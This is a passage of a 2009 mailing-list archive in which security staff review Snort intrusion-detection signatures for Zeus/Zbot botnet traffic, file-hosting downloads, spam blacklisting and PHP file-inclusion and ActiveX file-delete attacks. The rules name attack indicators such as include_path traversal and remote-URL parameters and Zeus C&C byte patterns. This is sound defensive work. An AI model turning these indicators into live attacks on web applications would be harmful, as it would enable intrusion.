could be added as well, since I believe > an popular RSS reader uses that user agent. > > Perhaps it is time for that signature to be removed? Do I hear a > second? > > Cheers, > Frank Seconded. CP -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 197 bytes Desc: This is a digitally signed message part Url : http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20090505/b6107d80/attachment.bin From jim.mcquaid at gmail.com Wed May 6 07:17:55 2009 From: jim.mcquaid at gmail.com (James McQuaid) Date: Wed, 6 May 2009 07:17:55 -0400 Subject: [Emerging-Sigs] Rar detection coming from china Message-ID: HostFresh was the network most closely associated with Russian organized crime. As with networks based in the U.S. 
and Europe, Russian criminals have used Chinese networks. They change IP addresses frequently to evade IP blocking, and as a consequence of domain suspensions. I took a look at this specific IP address; this operation appears to be native to China. James > Message: 1 > Date: Tue, 5 May 2009 10:29:59 +0200 > From: Thierry CHICH > Subject: [Emerging-Sigs] Rar detection coming from china > To: emerging-sigs at emergingthreats.net > Message-ID: <200905051029.59792.thierry.chich at ac-clermont.fr> > Content-Type: text/plain; charset="iso-8859-1" > > > Yesterday, on the net I manage, all the bad rar downloaded by trojans are > coming from this unique address 221.1.204.243. > Is it something to think about that ? Is "China netcom" considered in the same > way some russian providers are ? > > > -- > Thierry CHICH > Equipe R?seaux / Rectorat de Clermont-Ferrand > Tel: +33 4 73 99 30 54 > -------------- next part -------------- > An HTML attachment was scrubbed... > URL: http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20090505/6f4705c5/attachment-0001.html -- James McQuaid http://www.jamesmcquaid.com From juanma at ossim.net Wed May 6 08:15:21 2009 From: juanma at ossim.net (Juan Manuel Lorenzo) Date: Wed, 6 May 2009 14:15:21 +0200 Subject: [Emerging-Sigs] Megaupload Badongo Mediafire and Gigasize Message-ID: Hi, Here you have some rules to detect file downloads from some file storage web pages. 
alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET POLICY Megaupload file download access"; flow:to_server,established; content:"GET "; depth: 4; uricontent:"/?d="; content:"Host\:"; nocase; content:" megaupload.com"; nocase; classtype:policy-violation; sid:1000010101; rev:1;) alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET POLICY Badongo file download access"; flow:to_server,established; content:"GET "; depth: 4; uricontent:"/file/"; content:"Host\:"; nocase; content:"badongo.com"; nocase; content:"Cookie\: badongoL="; classtype:policy-violation; sid:1000010102; rev:1;) alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET POLICY MediaFire file download access"; flow:to_server,established; content:"GET "; depth: 4; uricontent:"/?"; content:"Host\:"; nocase; content:"mediafire.com"; nocase; classtype:policy-violation; sid:1000010103; rev:1;) alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET POLICY Gigasize file download access"; flow:to_server,established; content:"GET "; depth: 4; uricontent:"/get.php"; content:"Host\:"; nocase; content:" gigasize.com"; nocase; classtype:policy-violation; sid:1000010104; rev:1;) Juan Manuel Lorenzo ===================== juanma at ossim.net jmlorenzo at alienvault.com -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20090506/ae8f2da8/attachment.html From jonkman at jonkmans.com Wed May 6 10:08:06 2009 From: jonkman at jonkmans.com (Matt Jonkman) Date: Wed, 06 May 2009 10:08:06 -0400 Subject: [Emerging-Sigs] ET MALWARE Suspicious User Agent (Microsoft Internet Explorer) In-Reply-To: <1241561976.15728.2.camel@arodgers-panasonic> References: <20090505172808.51FD1A402B@medusa.richmond-family.org> <1241556345.45824.19.camel@localhost> <1241561976.15728.2.camel@arodgers-panasonic> Message-ID: <4A0199C6.2000101@jonkmans.com> But... I really like this one!! Lots of malware using it! 
But perhaps you're right. How about it goes commented out by default? Run it if it works for your net? Matt CunningPike wrote: > On Tue, 2009-05-05 at 15:45 -0500, Frank Knobbe wrote: >> On Tue, 2009-05-05 at 13:28 -0400, Nathaniel Richmond wrote: >>> SID 2002400 will trigger on GETs to "Host: vmware.com" or "Host: >>> live.com" because of the preceding dot in the negation for >>> vmware.com and live.com. I'm getting some non-malicious hits on this >>> signature. I believe vmware may use this as a user-agent when >>> checking for updates from a Windows host. > > > >> There are many other sites that could be added as well, since I believe >> an popular RSS reader uses that user agent. >> >> Perhaps it is time for that signature to be removed? Do I hear a >> second? >> >> Cheers, >> Frank > > Seconded. > > CP > > > ------------------------------------------------------------------------ > > _______________________________________________ > Emerging-sigs mailing list > Emerging-sigs at emergingthreats.net > http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs -- -------------------------------------------- Matthew Jonkman Emerging Threats Phone 765-429-0398 Fax 312-264-0205 http://www.emergingthreats.net -------------------------------------------- PGP: http://www.jonkmans.com/mattjonkman.asc From jonkman at jonkmans.com Wed May 6 12:30:01 2009 From: jonkman at jonkmans.com (Matt Jonkman) Date: Wed, 06 May 2009 12:30:01 -0400 Subject: [Emerging-Sigs] Megaupload Badongo Mediafire and Gigasize In-Reply-To: References: Message-ID: <4A01BB09.9040904@jonkmans.com> These look good. I'll put a within for the domain name/host header. But other than that good to go. Thanks Juan! Matt Juan Manuel Lorenzo wrote: > Hi, > > Here you have some rules to detect file downloads from some file storage > web pages. 
> > alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET POLICY > Megaupload file download access"; flow:to_server,established; > content:"GET "; depth: 4; uricontent:"/?d="; content:"Host\:"; nocase; > content:"megaupload.com "; nocase; > classtype:policy-violation; sid:1000010101; rev:1;) > alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET POLICY > Badongo file download access"; flow:to_server,established; content:"GET > "; depth: 4; uricontent:"/file/"; content:"Host\:"; nocase; > content:"badongo.com "; nocase; content:"Cookie\: > badongoL="; classtype:policy-violation; sid:1000010102; rev:1;) > alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET POLICY > MediaFire file download access"; flow:to_server,established; > content:"GET "; depth: 4; uricontent:"/?"; content:"Host\:"; nocase; > content:"mediafire.com "; nocase; > classtype:policy-violation; sid:1000010103; rev:1;) > alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET POLICY > Gigasize file download access"; flow:to_server,established; content:"GET > "; depth: 4; uricontent:"/get.php"; content:"Host\:"; nocase; > content:"gigasize.com "; nocase; > classtype:policy-violation; sid:1000010104; rev:1;) > > > Juan Manuel Lorenzo > > ===================== > juanma at ossim.net > jmlorenzo at alienvault.com > > > ------------------------------------------------------------------------ > > _______________________________________________ > Emerging-sigs mailing list > Emerging-sigs at emergingthreats.net > http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs -- -------------------------------------------- Matthew Jonkman Emerging Threats Phone 765-429-0398 Fax 312-264-0205 http://www.emergingthreats.net -------------------------------------------- PGP: http://www.jonkmans.com/mattjonkman.asc From jonkman at jonkmans.com Wed May 6 13:00:51 2009 From: jonkman at jonkmans.com (Matt Jonkman) Date: Wed, 06 May 2009 13:00:51 -0400 Subject: [Emerging-Sigs] RBN blocks 
blocking indian registrar mitsu.in In-Reply-To: <4A006B24.2080005@secnap.net> References: <4A006B24.2080005@secnap.net> Message-ID: <4A01C243.6090602@jonkmans.com> Checking with Jim, more shortly Matt Michael Scheidell wrote: > looks like your RBN blocks lists are blocking the .in registrar. > > not a good idea. > > > grep 67.15.47.4 /var/log/snort.log > May 5 12:23:19 scanner snort[14078]: [1:2407153:127] ET RBN Known > Russian Business Network Monitored Domains - BLOCKING (154) > [Classification: Misc Attack] [Priority: 2]: {TCP} 67.15.47.4:80 > > host www.mitsu.in > www.mitsu.in is an alias for indiandomains.supersite.myorderbox.com. > indiandomains.supersite.myorderbox.com has address 67.15.184.7 > > > also, 67.15.47.7 67.15.47.3.. (their dns servers) > > > > > -- > Michael Scheidell, CTO > Phone: 561-999-5000, x 1259 >> *| *SECNAP Network Security Corporation > > * Certified SNORT Integrator > * 2008-9 Hot Company Award Winner, World Executive Alliance > * Five-Star Partner Program 2009, VARBusiness > * Best Anti-Spam Product 2008, Network Products Guide > * King of Spam Filters, SC Magazine 2008 > > > ------------------------------------------------------------------------ > > This email has been scanned and certified safe by SpammerTrap?. 
> For Information please see www.secnap.com/products/spammertrap/

From jonkman at jonkmans.com Wed May 6 13:29:21 2009
From: jonkman at jonkmans.com (Matt Jonkman)
Date: Wed, 06 May 2009 13:29:21 -0400
Subject: [Emerging-Sigs] Zbot,Zues,WsPoem > v1.2.x.x Signatures
In-Reply-To: <1241532428.6818.7.camel@kinta>
References: <1241532428.6818.7.camel@kinta>
Message-ID: <4A01C8F1.1030206@jonkmans.com>

So what's the consensus on these? Good to post or is there more info we need on them?

Thanks by the way!

Matt

dxp wrote:
> Daniel,
>
> I think these signatures will have many False Negatives due to the fact that they will be detecting only the trojan which you've obtained traffic captures from. Zeus versions 1.2.x.x use RC4 encryption in all C&C communication thus data will only match for those which use the same key.
>
> The reason why there are similar bytes in three of the captures is due to same header in all those POSTs which are encrypted with the same key. Once the key is changed, which is unique per botnet and can easily change at the will of the botmaster, the signatures won't provide detection.
>
> Basically, from the perspective of IDS it only sees random bytes in the POST. The only thing which is static is the minimum amount of bytes which must be present for a valid record. However, within those bytes there's nothing unique.
>
> -
>
> -=[ dxp ]=-
> 0xA3F3C6E3
>
> On Tue, 2009-05-05 at 00:24 -0500, Daniel Clemens wrote:
>>
>> alert tcp any any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ETC Zbot/Zues/WsPoem > v1.2.x.x POST"; flow:established,to_server;content:"POST";depth:5; content:"|e5 c6 80 37 55 67 da e5|";flowbits:noalert;flowbits:set,Zlob.POST; reference:url,www.packetninjas.net/?p=586;classtype:trojan-activity;sid:xxx;rev:1;)
>>
>> alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"ETC Zbot/Zues/WsPoem > v1.2.x.x Server Response"; flow:established,to_client;content:"|29 69 7f 1f e5 c6 80 37 5f 67 da e5 1a 21 71 4c|"; content:"|d8 ee 78 25 99 7f 6f 62 09 fe 1f 6c 91 cc 52 7b|";content:"|b0 d2 ef 20 9e 7a 34 80 14 f3 cc 3d 51 7b|"; flowbits:isset,Zlob.POST;reference:url,www.packetninjas.net/?p=586;classtype:trojan-activity;sid:xxx; rev:1;)
>>
>> Similarities in initial POSTS:
>>
>> Responses:
>>
>> Other links which include information about Zbot,Zues,WsPoem:
>> http://dxp2532.blogspot.com/2009/04/zeus-zbot-prg-ntos-wsnpoem.html
>> http://blogs.technet.com/mmpc/archive/2008/10/10/malware-writer-wants-an-eye-to-eye-with-us.aspx
>> http://blog.s21sec.com/2009/04/when-bot-master-goes-mad-kill-os.html
>> http://www.malwaredomainlist.com/forums/index.php?topic=2514.msg7621#msg7621
>> http://sunbeltblog.blogspot.com/2009/01/sriurz-sez-hello-from-russia.html
>> http://www.threatexpert.com/blog/zbot/DecodeZeusConfig.zip
>> http://garwarner.blogspot.com/2008/11/enlisting-your-bank-to-steal-your.html
>>
>> Older Historical Quotes for context:
>> Botnet-controlled Trojan robbing online bank customers
>> Security firm says malware targeting commercial customers believed to have come from Russia
>> By Ellen Messmer, Network World, 12/13/07
>>
>> "It's been very successful since we've first seen this at the end of November," says Don Jackson, senior security researcher at SecureWorks, which believes the Prg Trojan variant is
>> designed by the Russian hackers group known as Russian UpLevel working with some German affiliates.
>>
>> | Daniel Uriah Clemens
>> | Packetninjas L.L.C | | http://www.packetninjas.net
>> | c. 205.567.6850 | | o. 866.267.8851
>> "The secret to creativity is knowing how to hide your sources" Einstein

From jonkman at jonkmans.com Wed May 6 14:22:22 2009
From: jonkman at jonkmans.com (Matt Jonkman)
Date: Wed, 06 May 2009 14:22:22 -0400
Subject: [Emerging-Sigs] IP address on Spamhaus (Spam BlackList)
In-Reply-To: <53834cf20905040755i1686ab10qd328d057957f089@mail.gmail.com>
References: <53834cf20905040755i1686ab10qd328d057957f089@mail.gmail.com>
Message-ID: <4A01D55E.5090207@jonkmans.com>

Ya, that sig would surely work. So you're looking to be able to block folks that get rejected by spamhaus?

Matt

Jaime Blasco wrote:
> Hi!
>
> I've been analyzing some spam traffic, related to snort's rule:
> policy.rules:alert tcp $SMTP_SERVERS 25 -> $EXTERNAL_NET any (msg:"POLICY SMTP relaying denied"; flow:established,from_server; content:"550 5.7.1"; depth:70; reference:arachnids,249; reference:url,mail-abuse.org/tsi/ar-fix.html; classtype:misc-activity; sid:567; rev:11;)
>
> we could write a rule to detect smtp responses like this:
> 553 Mail from *.*.* not allowed - 5.7.1 [BL23] Connections not accepted from IP addresses on Spamhaus XBL; see http://postmaster.yahoo.com/550-bl23.html [550]
>
> alert tcp $EXTERNAL_NET 25 -> $HOME_NET any (msg:"ET POLICY IP address BlackListed (Spamhaus)"; flow:established,from_server; content:"553 Mail from"; content:"Spamhaus XBL"; classtype:misc-activity; sid:; rev:1;)
>
> Regards
>
> --
> _______________________________
>
> Jaime Blasco
>
> www.ossim.com
> www.alienvault.com
> Email: jaime.blasco at alienvault.com

From dxp2532 at gmail.com Wed May 6 15:22:53 2009
From: dxp2532 at gmail.com (dxp)
Date: Wed, 06 May 2009 15:22:53 -0400
Subject: [Emerging-Sigs] Zbot,Zues,WsPoem > v1.2.x.x Signatures
In-Reply-To: <4A01C8F1.1030206@jonkmans.com>
References: <1241532428.6818.7.camel@kinta> <4A01C8F1.1030206@jonkmans.com>
Message-ID: <1241637773.6818.41.camel@kinta>

Technically it'll detect that particular trojan until the key or data size changes. So, it's worth keeping for a while, perhaps current events, just not sure for how long.
However, if the IP/Domain it sends data to is already on the block list from Zeus tracker then this sig may be redundant.

-
-=[ dxp ]=-
0xA3F3C6E3

On Wed, 2009-05-06 at 13:29 -0400, Matt Jonkman wrote:
> So what's the consensus on these? Good to post or is there more info we need on them?
>
> Thanks by the way!
>
> Matt
>
> dxp wrote:
> > Daniel,
> >
> > [...]

From frank at knobbe.us Wed May 6 15:59:36 2009
From: frank at knobbe.us (Frank Knobbe)
Date: Wed, 06 May 2009 14:59:36 -0500
Subject: [Emerging-Sigs] ET MALWARE Suspicious User Agent (Microsoft Internet Explorer)
In-Reply-To: <4A0199C6.2000101@jonkmans.com>
References: <20090505172808.51FD1A402B@medusa.richmond-family.org> <1241556345.45824.19.camel@localhost> <1241561976.15728.2.camel@arodgers-panasonic> <4A0199C6.2000101@jonkmans.com>
Message-ID: <1241639976.88470.18.camel@localhost>

On Wed, 2009-05-06 at 10:08 -0400, Matt Jonkman wrote:
> But... I really like this one!!
>
> Lots of malware using it!
>
> But perhaps you're right. How about it goes commented out by default? Run it if it works for your net?

Nah, I'd leave it in enabled. Folks can disable it themselves if they like.

FWIW, I have yet to catch malware with that sig :)

-Frank

From frank at knobbe.us Wed May 6 16:01:22 2009
From: frank at knobbe.us (Frank Knobbe)
Date: Wed, 06 May 2009 15:01:22 -0500
Subject: [Emerging-Sigs] IP address on Spamhaus (Spam BlackList)
In-Reply-To: <4A01D55E.5090207@jonkmans.com>
References: <53834cf20905040755i1686ab10qd328d057957f089@mail.gmail.com> <4A01D55E.5090207@jonkmans.com>
Message-ID: <1241640082.88470.20.camel@localhost>

On Wed, 2009-05-06 at 14:22 -0400, Matt Jonkman wrote:
> Ya, that sig would surely work. So you're looking to be able to block folks that get rejected by spamhaus?

I think that's counter-productive since the signature alerts on when YOU are rejected. I wouldn't want to block myself :)

The sig could work in detecting if oneself has been black-listed. Though usually folks find out with bounced emails :)

Cheers,
Frank
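dxp's point in the Zbot/Zeus thread above (RC4-encrypted POSTs, one key per botnet, so fixed bytes only ever match the botnet the capture came from) can be checked with a few lines of Python. This is an added example, not code from the thread and not Zeus's own code: the 16-byte record header, the bot reports and the two botnet keys are constructed stand-ins and do not reproduce the real Zeus 1.2 record layout. What carries over is the mechanism: RC4 is a stream cipher, so under one key a constant plaintext header always encrypts to the same ciphertext prefix (the similar bytes dxp mentions in three of Daniel's captures), and under a different key the same header encrypts to unrelated bytes, so a content match cut from those bytes stays silent.

```python
# Added example: why fixed-byte signatures on RC4-encrypted C&C only catch
# the botnet whose capture they were cut from. Keys, header and bodies are
# constructed stand-ins, not Zeus's real record format or any real key.


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA). Encryption and decryption are the same op."""
    S = list(range(256))
    j = 0
    for i in range(256):                       # key scheduling
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for byte in data:                          # keystream generation + XOR
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


# Constructed stand-in for the fixed header every report starts with
# (assumption: 16 bytes, constant across all bots of one botnet).
RECORD_HEADER = b"\x01\x00\x00\x00" + b"\x00" * 12

# Constructed per-botnet keys (assumption; in Zeus the key is chosen by
# the botmaster and differs per botnet).
KEY_BOTNET_A = b"botnet-A-secret"
KEY_BOTNET_B = b"botnet-B-secret"


def encrypt_report(key: bytes, body: bytes) -> bytes:
    """What the POST body carries on the wire: RC4(header || body)."""
    return rc4(key, RECORD_HEADER + body)


def cut_signature(capture: bytes, n: int = 8) -> bytes:
    """Mimic writing a content:"|..|" match from the first n bytes of one capture."""
    return capture[:n]


def signature_hits(sig: bytes, payload: bytes) -> bool:
    """A content match: the literal bytes appear anywhere in the payload."""
    return sig in payload


def demo() -> dict:
    """Run the comparison the thread is about and return the outcomes."""
    a1 = encrypt_report(KEY_BOTNET_A, b"bot-1 report: balance page seen")
    a2 = encrypt_report(KEY_BOTNET_A, b"bot-2 report: new credentials")
    b1 = encrypt_report(KEY_BOTNET_B, b"bot-1 report: balance page seen")
    sig = cut_signature(a1)
    return {
        # same key + same header -> identical ciphertext prefix, bodies differ
        "same_botnet_shares_prefix": a1[:len(RECORD_HEADER)] == a2[:len(RECORD_HEADER)],
        "sig_hits_same_botnet": signature_hits(sig, a2),
        # different key -> the same header encrypts to unrelated bytes
        "sig_hits_other_botnet": signature_hits(sig, b1),
        # the one invariant dxp names: a valid record has a minimum length
        "other_botnet_meets_min_len": len(b1) >= len(RECORD_HEADER),
    }


if __name__ == "__main__":
    for name, outcome in demo().items():
        print(f"{name}: {outcome}")
```

Running it prints the three outcomes dxp describes: the two reports from botnet A share their first 16 bytes and the cut signature hits both, while the same report under botnet B's key is not matched, and the only property the two botnets share is that the record is at least header-sized. Swapping the key is all a botmaster has to do to get the same effect.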
From emerging at emergingthreats.net Wed May 6 16:00:10 2009
From: emerging at emergingthreats.net (emerging@emergingthreats.net)
Date: Wed, 6 May 2009 16:00:10 -0400 (EDT)
Subject: [Emerging-Sigs] Emerging Threats Daily Signature Changes
Message-ID: <20090506200010.C5E8F4501B@goliath.jonkmans.com>

[***] Results from Oinkmaster started Wed May 6 16:00:10 2009 [***]

[+++] Added rules: [+++]

2009301 - ET POLICY Megaupload file download service access (emerging-policy.rules)
2009302 - ET POLICY Badongo file download service access (emerging-policy.rules)
2009303 - ET POLICY MediaFire file download service access (emerging-policy.rules)
2009304 - ET POLICY Gigasize file download service access (emerging-policy.rules)
2009305 - ET TROJAN Zlob post installation checkin (.php?inst_result=&hwid) (emerging-virus.rules)

[+++] Added non-rule lines: [+++]

-> Added to emerging-policy.rules (1):
#by Juan Manuel Lorenzo at ossim

-> Added to emerging-sid-msg.map (13):
2009301 || ET POLICY Megaupload file download service access || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/POLICY/POLICY_Download_Services || url,doc.emergingthreats.net/2009301
2009302 || ET POLICY Badongo file download service access || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/POLICY/POLICY_Download_Services || url,doc.emergingthreats.net/2009302
2009303 || ET POLICY MediaFire file download service access || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/POLICY/POLICY_Download_Services || url,doc.emergingthreats.net/2009303
2009304 || ET POLICY Gigasize file download service access || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/POLICY/POLICY_Download_Services || url,doc.emergingthreats.net/2009304
2009305 || ET TROJAN Zlob post installation checkin
(.php?inst_result=&hwid) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Zlob || url,doc.emergingthreats.net/2009305 || url,www.threatexpert.com/report.aspx?md5=1ca433d3f5538fda49c5defb59232f9d 2500134 || ET COMPROMISED Known Compromised or Hostile Host Traffic (135) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500135 || ET COMPROMISED Known Compromised or Hostile Host Traffic (136) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500136 || ET COMPROMISED Known Compromised or Hostile Host Traffic (137) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500137 || ET COMPROMISED Known Compromised or Hostile Host Traffic (138) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510134 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (135) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510135 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (136) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510136 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (137) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510137 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (138) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts -> Added to emerging-sid-msg.map.txt (13): 2009301 || ET POLICY Megaupload file download service access || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/POLICY/POLICY_Download_Services || url,doc.emergingthreats.net/2009301 2009302 || ET POLICY Badongo file download service access || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/POLICY/POLICY_Download_Services || url,doc.emergingthreats.net/2009302 2009303 || ET POLICY MediaFire file download service access || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/POLICY/POLICY_Download_Services || url,doc.emergingthreats.net/2009303 2009304 || ET POLICY Gigasize file download service 
access || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/POLICY/POLICY_Download_Services || url,doc.emergingthreats.net/2009304 2009305 || ET TROJAN Zlob post installation checkin (.php?inst_result=&hwid) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Zlob || url,doc.emergingthreats.net/2009305 || url,www.threatexpert.com/report.aspx?md5=1ca433d3f5538fda49c5defb59232f9d 2500134 || ET COMPROMISED Known Compromised or Hostile Host Traffic (135) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500135 || ET COMPROMISED Known Compromised or Hostile Host Traffic (136) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500136 || ET COMPROMISED Known Compromised or Hostile Host Traffic (137) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500137 || ET COMPROMISED Known Compromised or Hostile Host Traffic (138) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510134 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (135) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510135 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (136) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510136 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (137) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510137 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (138) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts From daniel.clemens at packetninjas.net Wed May 6 21:48:06 2009 From: daniel.clemens at packetninjas.net (Daniel Clemens) Date: Wed, 6 May 2009 20:48:06 -0500 Subject: [Emerging-Sigs] Zbot,Zues,WsPoem > v1.2.x.x Signatures In-Reply-To: <4A01C8F1.1030206@jonkmans.com> References: <1241532428.6818.7.camel@kinta> <4A01C8F1.1030206@jonkmans.com> Message-ID: On May 6, 2009, at 12:29 PM, Matt Jonkman wrote: > So what's the consensus on these? 
> Good to post or is there more info we need on them?
>

After talking with dxp I will have to do further analysis before these go live :(

> Thanks by the way!
>
> Matt
>
> dxp wrote:
>> Daniel,
>>
>> [...]

From jim.mcquaid at gmail.com Wed May 6 23:58:56 2009
From: jim.mcquaid at gmail.com (James McQuaid)
Date: Wed, 6 May 2009 23:58:56 -0400
Subject: [Emerging-Sigs] Emerging-sigs Digest, Vol 18, Issue 7

Hello Michael,

Thank you for pointing this out. The bad stuff which previously resided here has gone. This was a reverse of 67-15-47-7.opticaljungle.com. We are deploying a database solution.

James

> 1.
RBN blocks blocking indian registrar mitsu.in (Michael Scheidell) -- James McQuaid http://www.jamesmcquaid.com From signatures at stillsecure.com Thu May 7 04:33:03 2009 From: signatures at stillsecure.com (signatures) Date: Thu, 7 May 2009 02:33:03 -0600 Subject: [Emerging-Sigs] StillSecure: 10 New Signatures - May-07-2009 Message-ID: <5C9E8CCEEB81ED498AC0C3B0054704F3054C292D@webmail.latis.com> Hi Matt, Please find 10 New Signatures below: 1. WEB-PHP WeBid cron.php include_path Parameter Local File Inclusion alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP WeBid cron.php include_path Parameter Local File Inclusion"; flow:to_server,established; content:"GET "; depth:4; uricontent:"/cron.php?"; nocase; uricontent:"include_path="; nocase; content:"../"; classtype:web-application-attack; reference:url,milw0rm.com/exploits/8195; reference:bugtraq,34074; sid:2009051; rev:1;) 2. WEB-PHP WeBid cron.php include_path Parameter Remote File Inclusion alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP WeBid cron.php include_path Parameter Remote File Inclusion"; flow:to_server,established; content:"GET "; depth:4; uricontent:"/cron.php?"; nocase; uricontent:"include_path="; nocase; pcre:"/include_path=\s*(https?|ftps?|php)\:\//Ui"; classtype:web-application-attack; reference:url,milw0rm.com/exploits/8195; reference:bugtraq,34074; sid:2009052; rev:1;) 3. WEB-PHP WeBid ST_browsers.php include_path Parameter Local File Inclusion alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP WeBid ST_browsers.php include_path Parameter Local File Inclusion"; flow:to_server,established; content:"GET "; depth:4; uricontent:"/ST_browsers.php?"; nocase; uricontent:"include_path="; nocase; content:"../"; classtype:web-application-attack; reference:url,milw0rm.com/exploits/8195; reference:bugtraq,34074; sid:2009053; rev:1;) 4. 
WEB-PHP WeBid ST_browsers.php include_path Parameter Remote File Inclusion alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP WeBid ST_browsers.php include_path Parameter Remote File Inclusion"; flow:to_server,established; content:"GET "; depth:4; uricontent:"/ST_browsers.php?"; nocase; uricontent:"include_path="; nocase; pcre:"/include_path=\s*(https?|ftps?|php)\:\//Ui"; classtype:web-application-attack; reference:url,milw0rm.com/exploits/8195; reference:bugtraq,34074; sid:2009054; rev:1;) 5. WEB-PHP WeBid ST_countries.php include_path Parameter Local File Inclusion alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP WeBid ST_countries.php include_path Parameter Local File Inclusion"; flow:to_server,established; content:"GET "; depth:4; uricontent:"/ST_countries.php?"; nocase; uricontent:"include_path="; nocase; content:"../"; classtype:web-application-attack; reference:url,milw0rm.com/exploits/8195; reference:bugtraq,34074; sid:2009055; rev:1;) 6. WEB-PHP WeBid ST_countries.php include_path Parameter Remote File Inclusion alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP WeBid ST_countries.php include_path Parameter Remote File Inclusion"; flow:to_server,established; content:"GET "; depth:4; uricontent:"/ST_countries.php?"; nocase; uricontent:"include_path="; nocase; pcre:"/include_path=\s*(https?|ftps?|php)\:\//Ui"; classtype:web-application-attack; reference:url,milw0rm.com/exploits/8195; reference:bugtraq,34074; sid:2009056; rev:1;) 7. 
WEB-PHP WeBid ST_platforms.php include_path Parameter Local File Inclusion alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP WeBid ST_platforms.php include_path Parameter Local File Inclusion"; flow:to_server,established; content:"GET "; depth:4; uricontent:"/ST_platforms.php?"; nocase; uricontent:"include_path="; nocase; content:"../"; classtype:web-application-attack; reference:url,milw0rm.com/exploits/8195; reference:bugtraq,34074; sid:2009058; rev:1;) 8. WEB-PHP WeBid ST_platforms.php include_path Parameter Remote File Inclusion alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP WeBid ST_platforms.php include_path Parameter Remote File Inclusion"; flow:to_server,established; content:"GET "; depth:4; uricontent:"/ST_platforms.php?"; nocase; uricontent:"include_path="; nocase; pcre:"/include_path=\s*(https?|ftps?|php)\:\//Ui"; classtype:web-application-attack; reference:url,milw0rm.com/exploits/8195; reference:bugtraq,34074; sid:2009059; rev:1;) 9. WEB-ATTACKS Orbit Downloader ActiveX Control Arbitrary File Delete alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"WEB-ATTACKS Orbit Downloader ActiveX Control Arbitrary File Delete"; flow:to_client,established; content:"clsid"; nocase; content:"3F1D494B-0CEF-4468-96C9-386E2E4DEC90"; nocase; distance:0; content:"download"; nocase; classtype:web-application-attack; reference:bugtraq,34200; reference:url,milw0rm.com/exploits/8257; sid:1000062; rev:1;) 10. 
